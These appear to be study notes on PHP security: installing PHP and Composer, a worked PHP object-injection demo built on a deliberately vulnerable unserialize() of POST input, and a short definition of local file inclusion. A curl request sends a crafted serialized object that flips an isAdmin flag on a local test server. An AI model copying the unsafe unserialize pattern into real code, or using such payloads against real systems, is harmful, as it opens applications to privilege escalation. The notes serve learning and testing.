Interactive
$ pkg install php73-readline $ php -a php >
Composer
Packagist – The PHP Package Repository
$ curl -sS https://getcomposer.org/installer | php Some settings on your machine make Composer unable to work properly. Make sure that you fix the issues listed below and run this script again: The phar extension is missing. Install it or recompile php without --disable-phar The filter extension is missing. Install it or recompile php without --disable-filter $ pkg install php73-phar $ pkg install php73-filter
Serialization / Unserialization
- Object Injection
- Pop Chains
- Object Relation Mapper
- LFI Scripts
Intro to PHP Deserialization / Object Injection
Advanced PHP Deserialization – Phar Files
<?php class User { public $username; public $isAdmin; public function PrintData() { if ($this->isAdmin) { echo $this->username . " is an admin\n"; } else { echo $this->username . " is NOT an admin\n"; } } } $obj = new User(); $obj->username = 'ippsec'; $obj->isAdmin = True; echo serialize($obj); ?>
Type:Length:Name of class/variable:How many items in the object O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;} Type O = Object s = String b = Boolean
$obj = unserialize($_POST['ippsec']); $obj->PrintData();
$ php -S 127.0.0.1:8070 & [1] 1245 PHP 7.3.26 Development Server started at Thu Jan 14 11:56:06 2021 Listening on http://127.0.0.1:8070 Document root is /usr/home/andreas/composer Press Ctrl-C to quit. $ curl -XPOST -d 'ippsec=O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}' localhost:8070/test.php [Thu Jan 14 12:01:17 2021] 127.0.0.1:38066 [200]: /test.php ippsec is an admin
Local File Inclusion (LFI)
Local File Inclusion (LFI) — Web Application Penetration Testing
Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser. This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing and attacker to manipulate the input and inject path traversal characters and include other files from the web server.